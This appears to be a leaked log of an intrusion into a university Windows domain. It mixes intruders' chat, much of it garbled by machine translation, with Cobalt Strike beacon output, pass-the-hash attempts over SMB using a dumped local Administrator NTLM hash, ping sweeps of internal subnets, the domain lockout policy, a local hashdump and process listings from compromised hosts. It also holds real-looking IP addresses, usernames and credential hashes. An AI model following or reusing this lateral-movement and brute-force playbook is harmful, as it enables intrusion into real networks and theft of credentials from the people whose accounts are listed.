[+] 139.62.59.236:445 - 139.62.59.236:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f70886839806891019eb43397e2668' Administrator
[+] 139.62.57.118:445 - 139.62.57.118:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator
[+] 139.62.59.229:445 - 139.62.59.229:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator
[+] 139.62.57.227:445 - 139.62.57.227:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f70886839806891019eb43397e2668' Administrator
[+] 139.62.59.87:445 - 139.62.59.87:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator
``okay if not we'll go to all 100 pc's and look for admin hashes or more brute-force accesses and so on``
[-] 139.62.58.40:445 - 139.62.58.40:445 - Could not connect
``````
[-] 139.62.57.116:445 - 139.62.57.116:445 - Could not connect
``````
[-] 139.62.59.174:445 - 139.62.59.174:445 - Could not connect
``As a local admin, check this account on the server OS yet.``
[-] 139.62.59.222:445 - 139.62.59.222:445 - Could not connect
[-] 139.62.58.46:445 - 139.62.58.46:445 - Could not connect
[-] 139.62.58.195:445 - 139.62.58.195:445 - Could not connect
[-] 139.62.59.25:445 - 139.62.59.25:445 - Could not connect
[-] 139.62.59.237:445 - 139.62.59.237:445 - Could not connect
[-] 139.62.59.243:445 - 139.62.59.243:445 - Could not connect
[-] 139.62.57.36:445 - 139.62.57.36:445 - Could not connect
[-] 139.62.59.141:445 - 139.62.59.141:445 - Could not connect
[-] 139.62.57.214:445 - 139.62.57.214:445 - Could not connect
``Well, what do you see but don't respond smb445 port can't see it and pinged this 7530 Objects returned[ ](https://mediaeveryone.com/group/unf-edu?msg=W2346Kw5foKbrrf7E) not 1k there
[-] 139.62.57.204:445 - 139.62.57.204:445 - Could not connect
[-] 139.62.59.17:445 - 139.62.59.17:445 - Could not connect
[-] 139.62.58.245:445 - 139.62.58.245:445 - Could not connect
[-] 139.62.59.86:445 - 139.62.59.86:445 - Could not connect
[-] 139.62.59.31:445 - 139.62.59.31:445 - Could not connect
[-] 139.62.59.124:445 - 139.62.59.124:445 - Could not connect
[-] 139.62.59.14:445 - 139.62.59.14:445 - Could not connect
[-] 139.62.58.244:445 - 139.62.58.244:445 - Could not connect
[-] 139.62.59.198:445 - 139.62.59.198:445 - Could not connect
[-] 139.62.58.140:445 - 139.62.58.140:445 - Could not connect
``There's a load of 128 out of 1k stop, not all of it```.
139.62.59.113
139.62.58.236
139.62.59.172
139.62.58.7
139.62.59.150
139.62.59.240
139.62.59.79
139.62.59.116
139.62.59.213
139.62.58.100
139.62.59.20
139.62.58.67
139.62.57.184
139.62.57.113
139.62.59.234
139.62.59.112
139.62.58.81
139.62.58.47
139.62.58.117
139.62.59.117
139.62.58.193
139.62.57.208
139.62.58.97
139.62.58.72
139.62.58.75
139.62.59.135
139.62.59.203
139.62.58.68
139.62.58.223
139.62.57.232
139.62.59.200
139.62.59.99
139.62.59.35
139.62.57.216
139.62.57.19
139.62.57.100
139.62.59.223
139.62.57.66
139.62.59.220
139.62.57.152
139.62.58.86
139.62.134.212
139.62.58.215
139.62.57.240
139.62.58.43
139.62.59.97
139.62.57.129
139.62.59.19
139.62.58.99
139.62.58.144
139.62.59.71
139.62.59.92
139.62.57.212
139.62.57.49
139.62.57.170
139.62.58.118
139.62.59.15
139.62.59.127
139.62.57.191
139.62.57.11
139.62.59.165
139.62.58.243
139.62.59.0
139.62.58.216
139.62.58.135
139.62.58.0
139.62.57.44
139.62.58.51
139.62.58.210
139.62.58.231
139.62.58.105
139.62.59.16
139.62.59.251
139.62.58.153
139.62.57.130
139.62.59.212
139.62.57.23
139.62.58.225
139.62.58.221
139.62.59.34
139.62.57.27
139.62.59.192
139.62.58.208
139.62.57.82
139.62.57.157
139.62.57.52
139.62.58.74
139.62.57.182
139.62.57.69
139.62.57.201
139.62.58.177
139.62.58.48
139.62.59.75
139.62.58.201
139.62.58.237
139.62.59.232
139.62.57.56
139.62.57.13
139.62.58.20
139.62.58.93
139.62.59.236
139.62.59.161
139.62.57.204
139.62.59.17
139.62.58.245
139.62.57.118
139.62.57.227
139.62.59.229
139.62.59.87
139.62.59.86
139.62.59.124
139.62.59.31
139.62.59.14
139.62.59.198
139.62.58.140
139.62.58.244
139.62.58.40
139.62.57.116
139.62.59.174
139.62.59.222
139.62.58.46
139.62.58.195
139.62.59.25
139.62.57.36
139.62.59.243
139.62.59.237
139.62.59.141
139.62.57.214
``I mean you have admin access to all the PCs covered? It's all win 10 eh) everywhere admin
.\Administrator with this hash to all and sundry computes here `U=Frozen,OU=Computers,OU=CCB,DC=unfcsd,DC=edu` ``Do not fit``.
[-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668'
[-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\donh:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668'
[-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\donovanf:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668'
[-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\johns:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668'
[-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\krist:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668'
[-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\mikeh:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668'
[-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\nates:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668'
[-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\ServiceAdmin:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668',
``then change the hashga''.
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 393 bytes
[+] received output:
unfcsd.unf.edu
The ``domain'' is correct by the way?
OU=Frozen,OU=Computers,OU=CCB,DC=unfcsd,DC=unf,DC=edu
```
I'm building these now, there's a shitload of them and they're all on the same subnet, and they're also wine 10 edukeyshon ```
aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668
``it takes a full hash that is not tacon takes a hash[ ](https://mediaeveryone.com/group/unf-edu?msg=4LoEQGHu49GLXkNRa) and what's wrong with it?
OU=_Testing,OU=Frozen,OU=Computers,OU=CCB,DC=unfcsd,DC=unf,DC=edu
```
there are 4 of them here, only the one I'm sitting on now is alive?)) by pkk groups YES didn't fit ```
[-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\Administrator:011f7088683980681019eb43397e2668',
[-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\donh:011f7088683980681019eb43397e2668',
[-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\donovanf:011f7088683980681019eb43397e2668',
[-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\johns:011f7088683980681019eb43397e2668',
[-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\krist:011f7088683980681019eb43397e2668',
[-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\mikeh:011f7088683980681019eb43397e2668',
[-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\nates:011f7088683980681019eb43397e2668',
[-] 139.62.200.188:445 - 139.62.200.188:445 - Failed: 'unfcsd.unf.edu\ServiceAdmin:011f7088683980681019eb43397e2668',
``Everybody calm down, there will be few attempts if you can't find it all,`` but take it easy
on his hash on 1 attempt at each acKLA already after the check YES I'll brute-force that YES we're talking about check YES right now) LA - a local lockout is a domain policy on LA does not work lockoutka as well as logialerts did not cancel the lockout 5 minutes the main thing is not overdo it, there's a trachold on 6 tries and his hash would have checked for YES I would have checked the server win from that pool first he's local admin on more than a dozen ncs for sure Check the current local user Administrator928 of 1066?)you search for _Testing and find from two groups of pk[ ](https://mediaeveryone.com/group/unf-edu?msg=keYtHfj7RP6rDwbN4) ``
_Testing,,OU=Computers
``````
_Testing,OU=Frozen,OU=Computers
``certainly there could be such a situation
OU=_Testing,OU=Frozen,OU=Computers,OU=CCB,DC=unfcsd,DC=unf,DC=edu
``````
OU=Frozen,OU=Computers,OU=CCB,DC=unfcsd,DC=unf,DC=edu
``````
OU=Computers,OU=CCB,DC=unfcsd,DC=unf,DC=edu
``OU=_Testing - 4 pc in the same group
dn:CN=COB-62001,OU=_Testing,OU=Frozen,OU=Computers,OU=CCB,DC=unfcsd,DC=unf,DC=edu
``his OU and so on a group of pc's current from hell compszhyvye cars in the subnet :thinking:
and what did you mean by that?
(ICMP) Target '139.62.58.0' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.15' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.20' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.7' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.23' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.29' is alive. [read 8 bytes]
[+] received output:
(ICMP) Target '139.62.58.45' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.50' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.62' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.51' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.48' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.67' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.47' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.43' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.68' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.72' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.74' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.75' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.81' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.84' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.95' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.102' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.86' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.89' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.97' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.100' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.87' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.93' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.101' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.98' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.85' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.105' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.99' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.94' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.115' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.120' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.124' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.117' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.118' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.126' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.127' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.135' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.146' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.144' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.153' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.151' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.152' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.162' is alive. [read 8 bytes]
[+] received output:
(ICMP) Target '139.62.58.190' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.177' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.193' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.188' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.198' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.201' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.210' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.208' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.212' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.215' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.216' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.225' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.221' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.226' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.231' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.229' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.237' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.236' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.223' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.243' is alive. [read 8 bytes]
(ICMP) Target '139.62.58.252' is alive. [read 8 bytes]
``A lot of cars in the same group where you are now?``
The request will be processed at a domain controller for domain unfcsd.unf.edu.
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): 366
Minimum password length: 15
Length of password history maintained: 4
Lockout threshold: 6
Lockout duration (minutes): 5
Lockout observation window (minutes): 4
Computer role: BACKUP
The command completed successfully.
``Parallel politician more np
Alias name administrators
Comment
Members
-------------------------------------------------------------------------------
Administrator
UNFCSD/CCB Techs
UNFCSD\Domain Admins
UNFCSD\EMPLOYEE
UNFCSD/Student Domain Users
UNFCSD\Workstation Admins
The command completed successfully.
Give me another list of LA with this car is not fatal 1 check for each DA? that brut is not good so I do not know how to help brut on all the DA of the Passan kmd 5hash LA administrator "do not know how to help") )
funny)) the logopass gives hash kompachekay it somewhere)) the logopass? well, the LA hash you have they are local do not know how to help I did it yesterday ``
Administrator:500:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
defaultuser0:1000:aad3b435b51404eeaad3b435b51404ee:6e150af7e813d5c5c60cbc60ce89e17e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:af2b63295b0410a5ae59ec5cd12e7e44:::
``create in the first hashdump`` CEC-59126` but not here, has access to remote run commands but no admin rights`` COB-62001`` here sees systems processes CEC-59126
```
PID PPID Name Arch Session User
--- ---- ---- ---- ------- ----
0 0 [System Process]
4 0 System
120 4 Registry
476 4 smss.exe
3280 4 Memory Compression
624 612 csrss.exe
704 612 wininit.exe
812 704 services.exe
580 812 svchost.exe
584 812 svchost.exe
972 812 svchost.exe
984 812 svchost.exe
740 984 dllhost.exe
1748 984 RuntimeBroker.exe x64 1
2460 984 AcrobatNotificationClient.exe x86 1 UNFCSD\N00865522
3088 984 WmiPrvSE.exe
3156 984 WmiPrvSE.exe
5208,984 WmiPrvSE.exe
5852 984 WmiPrvSE.exe
6576 984 unsecapp.exe
7200 984 pcaevents.exe
8408,984 RuntimeBroker.exe x64 1 UNFCSD\N00865522
8460 984 LockApp.exe x64 1 UNFCSD\N00865522
9376 984 WmiPrvSE.exe
10068 984 WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe x64 1 UNFCSD\N00865522
10720 984 RuntimeBroker.exe x64 1 UNFCSD\N00865522
10996 984 ShellExperienceHost.exe x64 1 UNFCSD\N00865522
11464 984 SearchUI.exe x64 1 UNFCSD\N00865522
11492 984 RuntimeBroker.exe x64 1 UNFCSD\N00865522
11724 984 YourPhone.exe x64 1 UNFCSD\N00865522
11776 984 RuntimeBroker.exe x64 1 UNFCSD\N00865522
12476 984 smartscreen.exe x64 1 UNFCSD\N00865522
14220 984 SavApi.exe x86 1 UNFCSD\N00865522
15196 984 SkypeApp.exe x64 1 UNFCSD\N00865522
15888 984 SettingSyncHost.exe x64 1 UNFCSD\N00865522
17600 984 RuntimeBroker.exe x64 1 UNFCSD\N00865522
18732 984 ApplicationFrameHost.exe x64 1 UNFCSD\N00865522
20836 984 RuntimeBroker.exe x64 1 UNFCSD\N00865522
20896 984 backgroundTaskHost.exe x64 1 UNFCSD\N00865522
23444 984 Microsoft.Photos.exe x64 1 UNFCSD\N00865522
23592 984 Video.UI.exe x64 1 UNFCSD\N00865522
25964 984 RuntimeBroker.exe x64 1 UNFCSD\N00865522
26764 984 RuntimeBroker.exe x64 1 UNFCSD\N00865522
32996 984 SDXHelper.exe x86 1 UNFCSD\N00865522
63316 984 WmiPrvSE.exe
1076 812 svchost.exe
1096 812 svchost.exe
1120 812 svchost.exe
1148 812 svchost.exe
1204 812 svchost.exe
1212 812 svchost.exe
1220 812 svchost.exe
1224 812 svchost.exe
1236 812 svchost.exe
1240 812 svchost.exe
1400 812 svchost.exe
1432 812 svchost.exe
1484 812 svchost.exe
6916 1484 taskhostw.exe x64 1
12896 1484 SDXHelper.exe x86 1 UNFCSD\N00865522
30308 1484 CompatTelRunner.exe
9076 30308 CompatTelRunner.exe
51856 30308 conhost.exe
41348 1484 OfficeC2RClient.exe
1512 812 svchost.exe
1532 812 svchost.exe
1584 812 SEDService.exe
1592 812 McsClient.exe
1604 812 svchost.exe
1652 812 svchost.exe
1676 812 svchost.exe
1800 812 PresentationFontCache.exe
1804 812 svchost.exe
1924 812 svchost.exe
1952 812 svchost.exe
1976 812 AGSService.exe
2008 812 SophosCleanM.exe
2012 812 WUDFHost.exe
2092 812 svchost.exe
2100 812 svchost.exe
2112 812 svchost.exe
2228 812 svchost.exe
2272 812 svchost.exe
1396 2272 sihchost.exe x64 1 UNFCSD\N00865522
2388 812 svchost.exe
2472 812 svchost.exe
2592 812 svchost.exe
2740 812 svchost.exe
2772 812 svchost.exe
2828 812 svchost.exe
2912 812 hmpalert.exe
3020 812 svchost.exe
3076 812 HPBDSService.exe
3164 812 nvvsvc.exe
3172 812 nvSCPAPISvr.exe
3204 812 svchost.exe
3240 812 svchost.exe
3248 812 svchost.exe
3256 812 svchost.exe
3316 812 igfxCUIService.exe
3352 812 svchost.exe
3360 812 svchost.exe
3432 812 svchost.exe
3448 812 OfficeClickToRun.exe
3572 812 SavService.exe
3628 812 HeciServer.exe
3684 812 svchost.exe
3688 812 svchost.exe
3700 812 svchost.exe
3708 812 svchost.exe
3832 812 svchost.exe
3856 812 svchost.exe
3924 812 securityHealthService.exe
3936 812 svchost.exe
4036 812 NetworkLicenseServer.exe
4056 812 AeXNSAgent.exe
4064 812 AdobeUpdateService.exe
7888 4064 Adobe Installer.exe x86 1
4076 812 uUACTokenSvc.exe
4084 812 AGMService.exe
4092 812 svchost.exe
4116 812 SMSvcHost.exe
4124 812 SAVAdminService.exe
4200 812 swc_service.exe
4224 812 swi_filter.exe
5484 4224 swi_fc.exe
4240 812 SSPService.exe
4248 812 swi_service.exe
4264 812 svchost.exe
4272 812 svchost.exe
4288 812 svchost.exe x64 1 UNFCSD\N00865522
4296 812 svchost.exe
4304 812 svchost.exe
4312 812 svchost.exe
4320 812 svchost.exe
4328 812 svchost.exe
4336 812 svchost.exe
4344 812 svchost.exe
4352 812 svchost.exe
4360 812 svchost.exe
4368 812 svchost.exe
4400 812 SophosHealth.exe
4532 812 CptService.exe
4580 812 svchost.exe
4612 812 mqsvc.exe
4808 812 McsAgent.exe
4836 812 svchost.exe
4920 812 escsvc64.exe
5236 812 svchost.exe
5380 812 svchost.exe
5580 812 svchost.exe
6064 812 svchost.exe
6244 812 SMSvcHost.exe
6276 812 SeaPort.EXE
6520 812 svchost.exe
6780 812 ALsvc.exe
6824 812 CcmExec.exe
9716 6824 SCNotification.exe x64 1 UNFCSD\N00865522
6992 812 svchost.exe
8372 6992 ctfmon.exe x64 1 UNFCSD\N00865522
7564 812 DbxSvc.exe
7688 812 svchost.exe
8348 812 SophosSafestore64.exe
8840 812 svchost.exe
8884 812 sdcservice.exe
9012 812 svchost.exe
9368 812 jhi_service.exe
9568 812 LMS.exe
9732 812 svchost.exe
9760 812 UNS.exe
9828 812 svchost.exe
10060 812 SgrmBroker.exe
10112 812 SophosFS.exe
29752 10112 SophosFileScanner.exe
9348 29752 SophosFileScanner.exe
10424 812 svchost.exe x64 1 UNFCSD\N00865522
10560 812 svchost.exe
10940 812 Ctes.exe
22044 10940 ProviderHost.exe
16716 22044 conhost.exe
13384 812 svchost.exe
13932 812 svchost.exe
14060 812 svchost.exe
14152 812 svchost.exe
16408 812 svchost.exe
17164 812 svchost.exe x64 1
17608 812 svchost.exe
18232 812 svchost.exe
19872 812 uhssvc.exe
22292 812 abtSvcHost_.exe
23436 812 armsvc.exe
23660 812 scheduler.exe
9960 23660 FortiSSLVPNdaemon.exe
12932 23660 FortiSettings.exe
17876 23660 FortiTray.exe x64 1
24000 23660 FCDBLog.exe
23760 812 rpcnet.exe
24672 812 svchost.exe
25004 812 SophosNtpService.exe
26528 812 svchost.exe
26592 812 svchost.exe x64 1
26708 812 spoolsv.exe
27276 812 rpcld.exe
27816 812 CtesHostSvc.exe
28668 812 CtHWiPrvService.exe
28864 812 policyHost.exe
29052 812 SearchIndexer.exe
50868 29052 SearchProtocolHost.exe
54572 29052 SearchFilterHost.exe
824 704 lsass.exe
1004 704 fontdrvhost.exe
716 696 csrss.exe
804 696 winlogon.exe
772 804 dwm.exe
996 804 fontdrvhost.exe
12304 804 cmd.exe x64 1
30620 12304 conhost.exe x64 1 UNFCSD\N00865522
18600 804 cmd.exe x64 1 UNFCSD\N00865522
26296 18600 conhost.exe x64 1 UNFCSD\N00865522
26088 804 cmd.exe x64 1 UNFCSD\N00865522
28580 26088 conhost.exe x64 1 UNFCSD\N00865522
27996 804 cmd.exe x64 1 UNFCSD\N00865522
22668 27996 conhost.exe x64 1 UNFCSD\N00865522
28844 804 logonUI.exe
30016 804 cmd.exe x64 1 UNFCSD\N00865522
26120 30016 conhost.exe x64 1 UNFCSD\N00865522
27504 30016 SharpShares.exe x64 1 UNFCSD\N00865522
9352 9336 GoogleCrashHandler.exe
9360 9336 GoogleCrashHandler64.exe
10460 10384 igfxEM.exe x64 1 UNFCSD\N00865522
10484 10384 igfxHK.exe x64 1 UNFCSD\N00865522
10576 10384 igfxTray.exe x64 1 UNFCSD\N00865522
10664 10588 explorer.exe x64 1 UNFCSD\N00865522
4552 10664 CCXProcess.exe x64 1 UNFCSD\N00865522
15200 4552 node.exe x64 1 UNFCSD\N00865522
15212 15200 conhost.exe x64 1 UNFCSD\N00865522
11216 10664 SecurityHealthSystray.exe x64 1 UNFCSD\N00865522
13660 10664 OneDrive.exe x86 1 UNFCSD\N00865522
13740 10664 hppfaxprintersrv.exe x64 1 UNFCSD\N00865522
13844 10664 Apoint.exe x64 1 UNFCSD\N00865522
13812 13844 ApMsgFwd.exe x64 1 UNFCSD\N00865522
14420 13844 hidfind.exe x64 1 UNFCSD\N00865522
13896 10664 Sophos UI.exe x64 1 UNFCSD\N00865522
14052 10664 express.exe x86 1 UNFCSD\N00865522
16652 14052 CefSharp.BrowserSubprocess.exe x86 1 UNFCSD\N00865522
19908 10664 Zoom.exe x86 1 UNFCSD\N00865522
12532 19908 Zoom.exe x86 1 UNFCSD\N00865522
12848 3200 Teams.exe x86 1 UNFCSD\N00865522
3324 12848 Teams.exe x86 1 UNFCSD\N00865522
6696 12848 Teams.exe x86 1 UNFCSD\N00865522
6844 12848 Teams.exe x86 1 UNFCSD\N00865522
16964 12848 Teams.exe x86 1 UNFCSD\N00865522
17508,12848 Teams.exe x86 1 UNFCSD\N00865522
24584 12848 Teams.exe x86 1 UNFCSD\N00865522
25340 12848 Teams.exe x86 1 UNFCSD\N00865522
33028 12848 Teams.exe x86 1 UNFCSD\N00865522
13132 8176 dllhost.exe
14396 14864 EEventManager.exe x86 1 UNFCSD\N00865522
14428 14412 ApntEx.exe x64 1 UNFCSD\N00865522
14444 14428 conhost.exe x64 1 UNFCSD\N00865522
14972 14864 iusb3mon.exe x86 1 UNFCSD\N00865522
15260 14864 hpwuschd2.exe x86 1 UNFCSD\N00865522
15280 14864 jusched.exe x86 1 UNFCSD\N00865522
17696 15280 jucheck.exe x86 1 UNFCSD\N00865522
15308 14864 Creative Cloud.exe x64 1 UNFCSD\N00865522
15416 15308 Adobe CEF Helper.exe x64 1 UNFCSD\N00865522
15492 15308 Adobe CEF Helper.exe x64 1 UNFCSD\N00865522
16120 15308 Adobe Desktop Service.exe x86 1 UNFCSD\N00865522
11900 16120 CoreSync.exe x86 1 UNFCSD\N00865522
16764 16120 Creative Cloud Helper.exe x64 1 UNFCSD\N00865522
17360 15308 AdobeIPCBroker.exe x86 1 UNFCSD\N00865522
25664 15308 CCLibrary.exe x64 1 UNFCSD\N00865522
27556 25664 node.exe x64 1 UNFCSD\N00865522
15848 27556 conhost.exe x64 1 UNFCSD\N00865522
27656 15308 Adobe CEF Helper.exe x64 1 UNFCSD\N00865522
28880 15308 Adobe CEF Helper.exe x64 1 UNFCSD\N00865522
22540 21392 Dropbox.exe x86 1 UNFCSD\N00865522
17332 22540 QtWebEngineProcess.exe x86 1 UNFCSD\N00865522
19912 22540 Dropbox.exe x86 1 UNFCSD\N00865522
21868 22540 QtWebEngineProcess.exe x86 1 UNFCSD\N00865522
21872 22540 Dropbox.exe x86 1 UNFCSD\N00865522
22832 1772 acrotray.exe x86 1 UNFCSD\N00865522
27932 51660 MicrosoftEdge_X64_87.0.664.52_87.0.664.47.exe
51156 27932 setup.exe
22624 51156 setup.exe
``COB-62001
```
PID PPID Name Arch Session User
--- ---- ---- ---- ------- ----
0 0 [System Process]
4 0 System x64 0
56 4 Secure System x64 0 NT AUTHORITY\SYSTEM
112 4 Registry x64 0 NT AUTHORITY\SYSTEM
352 4 smss.exe x64 0 NT AUTHORITY\SYSTEM
1768 4 Memory Compression x64 0 NT AUTHORITY\SYSTEM
528 512 csrss.exe x64 0 NT AUTHORITY\SYSTEM
656 512 wininit.exe x64 0 NT AUTHORITY\SYSTEM
84 656 fontdrvhost.exe x64 0 Font Driver Host\UMFD-0
752 656 services.exe x64 0 NT AUTHORITY\SYSTEM
552 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
940 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM
980 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM
1292 980 WmiPrvSE.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1412 980 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE
5832 1412 rundll32.exe x64 0 UNFCSD\n01447311
4484 5832 cmd.exe x64 0 UNFCSD\n01447311
1072 4484 timeout.exe x64 0 UNFCSD\n01447311
4444 4484 conhost.exe x64 0 UNFCSD\n01447311
2720 980 WmiPrvSE.exe x64 0 NT AUTHORITY\n0144311
2724 980 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM
4844 980 WmiPrvSE.exe x64 0 NT AUTHORITY/\SYSTEM
1088 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM
1108 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
1184 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
1200 752 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1268 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1296 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1356 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
1452 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1500 752 atiesrxx.exe x64 0 NT AUTHORITY\SYSTEM
3292 1500 atieclxx.exe x64 1 NT AUTHORITY\SYSTEM
1548 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1556 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1564 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1572 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM
1592 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1600 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
1608 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
1616 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
1624 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
1632 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
1648 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
1780 752 igfxCUIService.exe x64 0 NT AUTHORITY/LOCAL SERVICE
1832 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1916 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
1956 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1968 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
2024 752 CcmExec.exe x64 0 NT AUTHORITY\SYSTEM
2128 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
2136 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
2164 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
2208 752 svchost.exe x64 0 NT AUTHORITY/ LOCAL SERVICE
2212 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM
